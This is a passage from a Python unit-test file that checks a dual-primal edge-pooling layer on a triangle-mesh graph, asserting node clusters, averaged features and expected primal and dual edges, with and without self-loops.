1 - attention_threshold) * (
float(pooling_idx) / len(edges_to_pool) +
torch.rand([num_heads], dtype=torch.float) * 1. /
len(edges_to_pool))
else:
primal_attention_coeffs = attention_threshold + torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * (1 - attention_threshold)
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in edges_to_pool):
pooling_idx = edges_to_pool.index(sorted(primal_edge))
primal_attention_coeffs[edge_idx] = (
attention_threshold - attention_threshold *
(float(pooling_idx) / len(edges_to_pool) +
torch.rand([num_heads], dtype=torch.float) * 1. /
len(edges_to_pool)))
# Create a single dual-primal edge-pooling layer.
pool = DualPrimalEdgePooling(
self_loops_in_output_dual_graph=False,
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
num_primal_edges_to_keep=15,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
allow_pooling_consecutive_edges=False,
return_old_dual_node_to_new_dual_node=True)
# Perform primal-edge pooling.
(new_primal_graph_batch, new_dual_graph_batch, new_petdni_batch,
pooling_log) = pool(primal_graph_batch=primal_graph_batch,
dual_graph_batch=dual_graph_batch,
primal_edge_to_dual_node_idx_batch=petdni_batch,
primal_attention_coeffs=primal_attention_coeffs)
# Tests on the new primal graph.
num_new_primal_nodes = maybe_num_nodes(
new_primal_graph_batch.edge_index)
num_new_primal_edges = new_primal_graph_batch.num_edges
self.assertEqual(num_new_primal_nodes, 8)
# - Check correspondence of the old primal nodes with the new primal
# nodes (i.e., node clusters).
old_primal_node_to_new_one = pooling_log.old_primal_node_to_new_one
for old_primal_node in range(num_primal_nodes):
if (old_primal_node in [0]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 0)
elif (old_primal_node in [1, 5]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 1)
elif (old_primal_node in [2, 3]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 2)
elif (old_primal_node in [4, 13]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 3)
elif (old_primal_node in [6, 7]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 4)
elif (old_primal_node in [8, 9]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 5)
elif (old_primal_node in [10, 11]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 6)
elif (old_primal_node == 12):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 7)
# - Check that the features of each new primal node correspond to the
# average of the features of the primal nodes merged together into
# that node.
for new_primal_node in range(num_new_primal_nodes):
old_primal_nodes_per_new_primal_node = [
0, [1, 5], [2, 3], [4, 13], [6, 7], [8, 9], [10, 11], 12
]
old_primal_nodes = old_primal_nodes_per_new_primal_node[
new_primal_node]
self.assertAlmostEqual(
new_primal_graph_batch.x[new_primal_node, 0].item(),
primal_graph_batch.x[old_primal_nodes, 0].mean().item(), 5)
# - Check the edges between the new primal nodes, which should be the
# following:
# - 0->1 / 1->0;
# - 0->4 / 4->0;
# - 0->6 / 6->0;
# - 1->2 / 2->1;
# - 1->3 / 3->1;
# - 1->4 / 4->1;
# - 2->3 / 3->2;
# - 2->5 / 5->2;
# - 3->5 / 5->3;
# - 3->7 / 7->3;
# - 4->6 / 6->4;
# - 4->7 / 7->4;
# - 5->6 / 6->5;
# - 6->7 / 7->6.
self.assertEqual(num_new_primal_edges, 28)
new_primal_edge_index_list = new_primal_graph_batch.edge_index.t(
).tolist()
for new_primal_edge in [[0, 1], [0, 4], [0, 6], [1, 2], [1, 3], [1, 4],
[2, 3], [2, 5], [3, 5], [3, 7], [4, 6], [4, 7],
[5, 6], [6, 7]]:
self.assertTrue(new_primal_edge in new_primal_edge_index_list)
self.assertTrue(new_primal_edge[::-1] in new_primal_edge_index_list)
# Check that opposite primal edges are associated to the same dual
# node.
self.assertEqual(new_petdni_batch[tuple(new_primal_edge)],
new_petdni_batch[tuple(new_primal_edge[::-1])])
# Tests on the new dual graph.
num_new_dual_nodes = maybe_num_nodes(new_dual_graph_batch.edge_index)
num_new_dual_edges = new_dual_graph_batch.num_edges
self.assertEqual(num_new_dual_nodes, num_new_primal_edges // 2)
# - Check that in case the border between two new face clusters is made
# of multiple edges of the original mesh, the dual feature associated
# to the new primal edge is the average of the dual features
# associated with the 'multiple edges of the original mesh'. This
# happens between new primal nodes 2--5.
# - New (directed) primal edge 2->5 corresponds to old (directed)
# primal edges 2->9 and 3->8.
idx_new_dual_node = new_petdni_batch[(2, 5)]
idx_old_dual_node_1 = petdni_batch[(2, 9)]
idx_old_dual_node_2 = petdni_batch[(3, 8)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - For all other cases, check that the dual feature associated to the
# new primal edge is the dual feature associated with edge of the
# original mesh that is now between the new primal nodes.
new_dual_nodes = [(0, 1), (0, 4), (0, 6), (1, 2), (1, 3), (1, 4),
(2, 3), (3, 5), (3, 7), (4, 6), (4, 7), (5, 6),
(6, 7)]
old_dual_nodes = [(0, 1), (0, 7), (0, 10), (1, 2), (4, 5), (5, 6),
(3, 4), (8, 13), (12, 13), (7, 11), (6, 12), (9, 10),
(11, 12)]
for new_dual_node, old_dual_node in zip(new_dual_nodes, old_dual_nodes):
idx_new_dual_node = new_petdni_batch[new_dual_node]
idx_old_dual_node = petdni_batch[old_dual_node]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# - Check that the mapping between old and new dual nodes is correct.
old_dual_node_to_new_one = pooling_log.old_dual_node_to_new_one
self.assertEqual(len(old_dual_node_to_new_one), num_dual_nodes)
old_dual_nodes_index_with_corresponding_new_one = [
petdni_batch[primal_edge]
for primal_edge in [(0, 1), (0, 7), (0, 10), (1, 2), (2, 9), (
3, 4), (3, 8), (4,
5), (5,
6), (6,
12), (7,
11), (8,
13), (9,
10), (11,
12), (12, 13)]
]
corresponding_new_dual_nodes = [
new_petdni_batch[primal_edge]
for primal_edge in [(0, 1), (0, 4), (0, 6), (1, 2), (2, 5), (
2, 3), (2, 5), (1, 3), (1, 4), (4, 7), (4,
6), (3,
5), (5,
6), (6,
7), (3,
7)]
]
for dual_node_idx in range(num_dual_nodes):
if (dual_node_idx in old_dual_nodes_index_with_corresponding_new_one
):
# - The old dual node has a corresponding new dual node.
self.assertEqual(
old_dual_node_to_new_one[dual_node_idx],
corresponding_new_dual_nodes[
old_dual_nodes_index_with_corresponding_new_one.index(
dual_node_idx)])
else:
# - The old dual node has no corresponding new dual node.
self.assertEqual(old_dual_node_to_new_one[dual_node_idx], -1)
# - Check the edges between the new dual nodes, which should be the
# following (with dual nodes indicated by the corresponding primal
# nodes as a set):
# - {0, 1} -> {0, 4};
# - {0, 1} -> {0, 6};
# - {0, 1} -> {1, 2};
# - {0, 1} -> {1, 3};
# - {0, 1} -> {1, 4};
# - {0, 4} -> {0, 1};
# - {0, 4} -> {0, 6};
# - {0, 4} -> {1, 4};
# - {0, 4} -> {4, 6};
# - {0, 4} -> {4, 7};
# - {0, 6} -> {0, 1};
# - {0, 6} -> {0, 4};
# - {0, 6} -> {4, 6};
# - {0, 6} -> {5, 6};
# - {0, 6} -> {6, 7};
# - {1, 2} -> {0, 1};
# - {1, 2} -> {1, 3};
# - {1, 2} -> {1, 4};
# - {1, 2} -> {2, 3};
# - {1, 2} -> {2, 5};
# - {1, 3} -> {0, 1};
# - {1, 3} -> {1, 2};
# - {1, 3} -> {1, 4};
# - {1, 3} -> {2, 3};
# - {1, 3} -> {3, 5};
# - {1, 3} -> {3, 7};
# - {1, 4} -> {0, 1};
# - {1, 4} -> {0, 4};
# - {1, 4} -> {1, 2};
# - {1, 4} -> {1, 3};
# - {1, 4} -> {4, 6};
# - {1, 4} -> {4, 7};
# - {2, 3} -> {1, 2};
# - {2, 3} -> {1, 3};
# - {2, 3} -> {2, 5};
# - {2, 3} -> {3, 5};
# - {2, 3} -> {3, 7};
# - {2, 5} -> {1, 2};
# - {2, 5} -> {2, 3};
# - {2, 5} -> {3, 5};
# - {2, 5} -> {5, 6};
# - {3, 5} -> {1, 3};
# - {3, 5} -> {2, 3};
# - {3, 5} -> {2, 5};
# - {3, 5} -> {3, 7};
# - {3, 5} -> {5, 6};
# - {3, 7} -> {1, 3};
# - {3, 7} -> {2, 3};
# - {3, 7} -> {3, 5};
# - {3, 7} -> {4, 7};
# - {3, 7} -> {6, 7};
# - {4, 6} -> {0, 4};
# - {4, 6} -> {0, 6};
# - {4, 6} -> {1, 4};
# - {4, 6} -> {4, 7};
# - {4, 6} -> {5, 6};
# - {4, 6} -> {6, 7};
# - {4, 7} -> {0, 4};
# - {4, 7} -> {1, 4};
# - {4, 7} -> {3, 7};
# - {4, 7} -> {4, 6};
# - {4, 7} -> {6, 7};
# - {5, 6} -> {0, 6};
# - {5, 6} -> {2, 5};
# - {5, 6} -> {3, 5};
# - {5, 6} -> {4, 6};
# - {5, 6} -> {6, 7};
# - {6, 7} -> {0, 6};
# - {6, 7} -> {3, 7};
# - {6, 7} -> {4, 6};
# - {6, 7} -> {4, 7};
# - {6, 7} -> {5, 6}.
self.assertEqual(num_new_dual_edges, 72)
new_dual_edge_index_list = new_dual_graph_batch.edge_index.t().tolist()
dual_node_1 = (0, 1)
other_dual_nodes = [(0, 4), (0, 6), (1, 2), (1, 3), (1, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (0, 4)
other_dual_nodes = [(0, 1), (0, 6), (1, 4), (4, 6), (4, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (0, 6)
other_dual_nodes = [(0, 1), (0, 4), (4, 6), (5, 6), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (1, 2)
other_dual_nodes = [(0, 1), (1, 3), (1, 4), (2, 3), (2, 5)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (1, 3)
other_dual_nodes = [(0, 1), (1, 2), (1, 4), (2, 3), (3, 5), (3, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (1, 4)
other_dual_nodes = [(0, 1), (0, 4), (1, 2), (1, 3), (4, 6), (4, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (2, 3)
other_dual_nodes = [(1, 2), (1, 3), (2, 5), (3, 5), (3, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (2, 5)
other_dual_nodes = [(1, 2), (2, 3), (3, 5), (5, 6)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (3, 5)
other_dual_nodes = [(1, 3), (2, 3), (2, 5), (3, 7), (5, 6)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (3, 7)
other_dual_nodes = [(1, 3), (2, 3), (3, 5), (4, 7), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (4, 6)
other_dual_nodes = [(0, 4), (0, 6), (1, 4), (4, 7), (5, 6), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (4, 7)
other_dual_nodes = [(0, 4), (1, 4), (3, 7), (4, 6), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (5, 6)
other_dual_nodes = [(0, 6), (2, 5), (3, 5), (4, 6), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (6, 7)
other_dual_nodes = [(0, 6), (3, 7), (4, 6), (4, 7), (5, 6)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
def __test_config_A_with_output_self_loops_nonconsecutive(
self, use_decreasing_attention_coefficient=True, num_heads=1):
# - Dual-graph configuration A.
single_dual_nodes = True
undirected_dual_edges = True
graph_creator = create_graphs.GraphCreator(
mesh_filename=osp.join(current_dir,
'../../common_data/simple_mesh_large.ply'),
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
primal_features_from_dual_features=False)
primal_graph, dual_graph = graph_creator.create_graphs()
petdni = graph_creator.primal_edge_to_dual_node_idx
(primal_graph_batch, dual_graph_batch,
petdni_batch) = create_dual_primal_batch(
primal_graphs_list=[primal_graph],
dual_graphs_list=[dual_graph],
primal_edge_to_dual_node_idx_list=[petdni])
# Primal graph.
num_primal_edges = primal_graph_batch.num_edges
num_primal_nodes = maybe_num_nodes(primal_graph_batch.edge_index)
self.assertEqual(num_primal_edges, 42)
self.assertEqual(num_primal_nodes, 14)
# - Check existence of primal edges.
for edge in [(0, 1), (0, 7), (0, 10), (1, 2), (1, 5), (2, 3), (2, 9),
(3, 4), (3, 8), (4, 5), (4, 13), (5, 6), (6, 7), (6, 12),
(7, 11), (8, 9), (8, 13), (9, 10), (10, 11), (11, 12),
(12, 13)]:
self.assertEqual(petdni_batch[edge], petdni_batch[edge[::-1]])
# - Set the features of each primal node randomly.
dim_primal_features = primal_graph_batch.num_node_features
for primal_feature in primal_graph_batch.x:
primal_feature[:] = torch.rand(dim_primal_features,
dtype=torch.float)
# Dual graph.
num_dual_edges = dual_graph_batch.num_edges
num_dual_nodes = maybe_num_nodes(dual_graph_batch.edge_index)
# - Since the mesh is watertight, the medial graph of the triangulation
# is 4-regular, hence each node in the dual graph has 4 incoming edges
# and 4 outgoing edges. However, since there are no self-loops in the
# dual graph, each incoming edge for a certain dual node is also an
# outgoing edge for another dual node, and the total number of
# (directed) edges in the dual graph is 4 times the number of dual
# nodes.
self.assertEqual(num_dual_edges, num_dual_nodes * 4)
self.assertEqual(num_dual_nodes, num_primal_edges // 2)
# - Set the features of each dual node randomly.
dim_dual_features = dual_graph_batch.num_node_features
for dual_feature in dual_graph_batch.x:
dual_feature[:] = torch.rand(dim_dual_features,
dtype=torch.float) * 3
# Randomly shuffle the primal edge-index matrix.
permutation = np.random.permutation(num_primal_edges)
primal_graph_batch.edge_index = (
primal_graph_batch.edge_index[:, permutation])
# Set the attention coefficients manually, so that the primal edges have
# associated attention coefficients in this order:
# - 4->13 / 13->4;
# - 10->11 / 11->10;
# - 0->10 / 10->0 [not pooled, because 10->11 / 11->10 was pooled];
# - 2->3 / 3->2;
# - 3->8 / 8->3 [not pooled, because 2->3 / 3->2 was pooled];
# - 6->7 / 7->6;
# - 1->5 / 5->1;
# - 7->11 / 11->7 [not pooled, because 10->11 / 11->10 and 6->7 / 7->6
# were pooled];
# - 1->2 / 2->1 [not pooled, because 2->3 / 3->2 and 1->5 / 5->1 were
# pooled];
# - 8->9 / 9->8;
# - ... [other edges that are not pooled]
# (cf. file `../../common_data/simple_mesh_large_pool_2.png`)
attention_threshold = 0.5
edges_to_pool = [[8, 9], [1, 2], [7, 11], [1, 5], [6, 7], [3, 8],
[2, 3], [0, 10], [10, 11], [4, 13]]
if (use_decreasing_attention_coefficient):
primal_attention_coeffs = torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * attention_threshold
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in edges_to_pool):
pooling_idx = edges_to_pool.index(sorted(primal_edge))
primal_attention_coeffs[edge_idx] = attention_threshold + (
1 - attention_threshold) * (
float(pooling_idx) / len(edges_to_pool) +
torch.rand([num_heads], dtype=torch.float) * 1. /
len(edges_to_pool))
else:
primal_attention_coeffs = attention_threshold + torch.rand(
[num_primal_edges, num_heads],
dtype=torch.float) * (1 - attention_threshold)
for edge_idx, primal_edge in enumerate(
primal_graph_batch.edge_index.t().tolist()):
if (sorted(primal_edge) in edges_to_pool):
pooling_idx = edges_to_pool.index(sorted(primal_edge))
primal_attention_coeffs[edge_idx] = (
attention_threshold - attention_threshold *
(float(pooling_idx) / len(edges_to_pool) +
torch.rand([num_heads], dtype=torch.float) * 1. /
len(edges_to_pool)))
# Create a single dual-primal edge-pooling layer.
pool = DualPrimalEdgePooling(
self_loops_in_output_dual_graph=True,
single_dual_nodes=single_dual_nodes,
undirected_dual_edges=undirected_dual_edges,
num_primal_edges_to_keep=15,
use_decreasing_attention_coefficient=
use_decreasing_attention_coefficient,
allow_pooling_consecutive_edges=False,
return_old_dual_node_to_new_dual_node=True)
# Perform primal-edge pooling.
(new_primal_graph_batch, new_dual_graph_batch, new_petdni_batch,
pooling_log) = pool(primal_graph_batch=primal_graph_batch,
dual_graph_batch=dual_graph_batch,
primal_edge_to_dual_node_idx_batch=petdni_batch,
primal_attention_coeffs=primal_attention_coeffs)
# Tests on the new primal graph.
num_new_primal_nodes = maybe_num_nodes(
new_primal_graph_batch.edge_index)
num_new_primal_edges = new_primal_graph_batch.num_edges
self.assertEqual(num_new_primal_nodes, 8)
# - Check correspondence of the old primal nodes with the new primal
# nodes (i.e., node clusters).
old_primal_node_to_new_one = pooling_log.old_primal_node_to_new_one
for old_primal_node in range(num_primal_nodes):
if (old_primal_node in [0]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 0)
elif (old_primal_node in [1, 5]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 1)
elif (old_primal_node in [2, 3]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 2)
elif (old_primal_node in [4, 13]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 3)
elif (old_primal_node in [6, 7]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 4)
elif (old_primal_node in [8, 9]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 5)
elif (old_primal_node in [10, 11]):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 6)
elif (old_primal_node == 12):
self.assertEqual(old_primal_node_to_new_one[old_primal_node], 7)
# - Check that the features of each new primal node correspond to the
# average of the features of the primal nodes merged together into
# that node.
for new_primal_node in range(num_new_primal_nodes):
old_primal_nodes_per_new_primal_node = [
0, [1, 5], [2, 3], [4, 13], [6, 7], [8, 9], [10, 11], 12
]
old_primal_nodes = old_primal_nodes_per_new_primal_node[
new_primal_node]
self.assertAlmostEqual(
new_primal_graph_batch.x[new_primal_node, 0].item(),
primal_graph_batch.x[old_primal_nodes, 0].mean().item(), 5)
# - Check the edges between the new primal nodes, which should be the
# following:
# - 0->1 / 1->0;
# - 0->4 / 4->0;
# - 0->6 / 6->0;
# - 1->2 / 2->1;
# - 1->3 / 3->1;
# - 1->4 / 4->1;
# - 2->3 / 3->2;
# - 2->5 / 5->2;
# - 3->5 / 5->3;
# - 3->7 / 7->3;
# - 4->6 / 6->4;
# - 4->7 / 7->4;
# - 5->6 / 6->5;
# - 6->7 / 7->6.
self.assertEqual(num_new_primal_edges, 28)
new_primal_edge_index_list = new_primal_graph_batch.edge_index.t(
).tolist()
for new_primal_edge in [[0, 1], [0, 4], [0, 6], [1, 2], [1, 3], [1, 4],
[2, 3], [2, 5], [3, 5], [3, 7], [4, 6], [4, 7],
[5, 6], [6, 7]]:
self.assertTrue(new_primal_edge in new_primal_edge_index_list)
self.assertTrue(new_primal_edge[::-1] in new_primal_edge_index_list)
# Check that opposite primal edges are associated to the same dual
# node.
self.assertEqual(new_petdni_batch[tuple(new_primal_edge)],
new_petdni_batch[tuple(new_primal_edge[::-1])])
# Tests on the new dual graph.
num_new_dual_nodes = maybe_num_nodes(new_dual_graph_batch.edge_index)
num_new_dual_edges = new_dual_graph_batch.num_edges
self.assertEqual(num_new_dual_nodes, num_new_primal_edges // 2)
# - Check that in case the border between two new face clusters is made
# of multiple edges of the original mesh, the dual feature associated
# to the new primal edge is the average of the dual features
# associated with the 'multiple edges of the original mesh'. This
# happens between new primal nodes 2--5.
# - New (directed) primal edge 2->5 corresponds to old (directed)
# primal edges 2->9 and 3->8.
idx_new_dual_node = new_petdni_batch[(2, 5)]
idx_old_dual_node_1 = petdni_batch[(2, 9)]
idx_old_dual_node_2 = petdni_batch[(3, 8)]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[[idx_old_dual_node_1, idx_old_dual_node_2],
0].mean().item(), 5)
# - For all other cases, check that the dual feature associated to the
# new primal edge is the dual feature associated with edge of the
# original mesh that is now between the new primal nodes.
new_dual_nodes = [(0, 1), (0, 4), (0, 6), (1, 2), (1, 3), (1, 4),
(2, 3), (3, 5), (3, 7), (4, 6), (4, 7), (5, 6),
(6, 7)]
old_dual_nodes = [(0, 1), (0, 7), (0, 10), (1, 2), (4, 5), (5, 6),
(3, 4), (8, 13), (12, 13), (7, 11), (6, 12), (9, 10),
(11, 12)]
for new_dual_node, old_dual_node in zip(new_dual_nodes, old_dual_nodes):
idx_new_dual_node = new_petdni_batch[new_dual_node]
idx_old_dual_node = petdni_batch[old_dual_node]
self.assertAlmostEqual(
new_dual_graph_batch.x[idx_new_dual_node, 0].item(),
dual_graph_batch.x[idx_old_dual_node, 0].item(), 5)
# - Check that the mapping between old and new dual nodes is correct.
old_dual_node_to_new_one = pooling_log.old_dual_node_to_new_one
self.assertEqual(len(old_dual_node_to_new_one), num_dual_nodes)
old_dual_nodes_index_with_corresponding_new_one = [
petdni_batch[primal_edge]
for primal_edge in [(0, 1), (0, 7), (0, 10), (1, 2), (2, 9), (
3, 4), (3, 8), (4,
5), (5,
6), (6,
12), (7,
11), (8,
13), (9,
10), (11,
12), (12, 13)]
]
corresponding_new_dual_nodes = [
new_petdni_batch[primal_edge]
for primal_edge in [(0, 1), (0, 4), (0, 6), (1, 2), (2, 5), (
2, 3), (2, 5), (1, 3), (1, 4), (4, 7), (4,
6), (3,
5), (5,
6), (6,
7), (3,
7)]
]
for dual_node_idx in range(num_dual_nodes):
if (dual_node_idx in old_dual_nodes_index_with_corresponding_new_one
):
# - The old dual node has a corresponding new dual node.
self.assertEqual(
old_dual_node_to_new_one[dual_node_idx],
corresponding_new_dual_nodes[
old_dual_nodes_index_with_corresponding_new_one.index(
dual_node_idx)])
else:
# - The old dual node has no corresponding new dual node.
self.assertEqual(old_dual_node_to_new_one[dual_node_idx], -1)
# - Check the edges between the new dual nodes, which should be the
# following (with dual nodes indicated by the corresponding primal
# nodes as a set), plus the self-loops:
# - {0, 1} -> {0, 4};
# - {0, 1} -> {0, 6};
# - {0, 1} -> {1, 2};
# - {0, 1} -> {1, 3};
# - {0, 1} -> {1, 4};
# - {0, 4} -> {0, 1};
# - {0, 4} -> {0, 6};
# - {0, 4} -> {1, 4};
# - {0, 4} -> {4, 6};
# - {0, 4} -> {4, 7};
# - {0, 6} -> {0, 1};
# - {0, 6} -> {0, 4};
# - {0, 6} -> {4, 6};
# - {0, 6} -> {5, 6};
# - {0, 6} -> {6, 7};
# - {1, 2} -> {0, 1};
# - {1, 2} -> {1, 3};
# - {1, 2} -> {1, 4};
# - {1, 2} -> {2, 3};
# - {1, 2} -> {2, 5};
# - {1, 3} -> {0, 1};
# - {1, 3} -> {1, 2};
# - {1, 3} -> {1, 4};
# - {1, 3} -> {2, 3};
# - {1, 3} -> {3, 5};
# - {1, 3} -> {3, 7};
# - {1, 4} -> {0, 1};
# - {1, 4} -> {0, 4};
# - {1, 4} -> {1, 2};
# - {1, 4} -> {1, 3};
# - {1, 4} -> {4, 6};
# - {1, 4} -> {4, 7};
# - {2, 3} -> {1, 2};
# - {2, 3} -> {1, 3};
# - {2, 3} -> {2, 5};
# - {2, 3} -> {3, 5};
# - {2, 3} -> {3, 7};
# - {2, 5} -> {1, 2};
# - {2, 5} -> {2, 3};
# - {2, 5} -> {3, 5};
# - {2, 5} -> {5, 6};
# - {3, 5} -> {1, 3};
# - {3, 5} -> {2, 3};
# - {3, 5} -> {2, 5};
# - {3, 5} -> {3, 7};
# - {3, 5} -> {5, 6};
# - {3, 7} -> {1, 3};
# - {3, 7} -> {2, 3};
# - {3, 7} -> {3, 5};
# - {3, 7} -> {4, 7};
# - {3, 7} -> {6, 7};
# - {4, 6} -> {0, 4};
# - {4, 6} -> {0, 6};
# - {4, 6} -> {1, 4};
# - {4, 6} -> {4, 7};
# - {4, 6} -> {5, 6};
# - {4, 6} -> {6, 7};
# - {4, 7} -> {0, 4};
# - {4, 7} -> {1, 4};
# - {4, 7} -> {3, 7};
# - {4, 7} -> {4, 6};
# - {4, 7} -> {6, 7};
# - {5, 6} -> {0, 6};
# - {5, 6} -> {2, 5};
# - {5, 6} -> {3, 5};
# - {5, 6} -> {4, 6};
# - {5, 6} -> {6, 7};
# - {6, 7} -> {0, 6};
# - {6, 7} -> {3, 7};
# - {6, 7} -> {4, 6};
# - {6, 7} -> {4, 7};
# - {6, 7} -> {5, 6}.
self.assertEqual(num_new_dual_edges, 72 + num_new_dual_nodes)
new_dual_edge_index_list = new_dual_graph_batch.edge_index.t().tolist()
dual_node_1 = (0, 1)
other_dual_nodes = [(0, 4), (0, 6), (1, 2), (1, 3), (1, 4)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (0, 4)
other_dual_nodes = [(0, 1), (0, 6), (1, 4), (4, 6), (4, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (0, 6)
other_dual_nodes = [(0, 1), (0, 4), (4, 6), (5, 6), (6, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (1, 2)
other_dual_nodes = [(0, 1), (1, 3), (1, 4), (2, 3), (2, 5)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (1, 3)
other_dual_nodes = [(0, 1), (1, 2), (1, 4), (2, 3), (3, 5), (3, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (1, 4)
other_dual_nodes = [(0, 1), (0, 4), (1, 2), (1, 3), (4, 6), (4, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (2, 3)
other_dual_nodes = [(1, 2), (1, 3), (2, 5), (3, 5), (3, 7)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (2, 5)
other_dual_nodes = [(1, 2), (2, 3), (3, 5), (5, 6)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (3, 5)
other_dual_nodes = [(1, 3), (2, 3), (2, 5), (3, 7), (5, 6)]
for other_dual_node in other_dual_nodes:
self.assertTrue([
new_petdni_batch[other_dual_node], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
# Self-loop.
self.assertTrue(
[new_petdni_batch[dual_node_1], new_petdni_batch[dual_node_1]
] in new_dual_edge_index_list)
dual_node_1 = (3, 7)
other_dual_nodes = [(1, 3), (2, 3), (3, 5), (4, 7), (6, 7)]
for other_dual_node in other_dual_nodes:
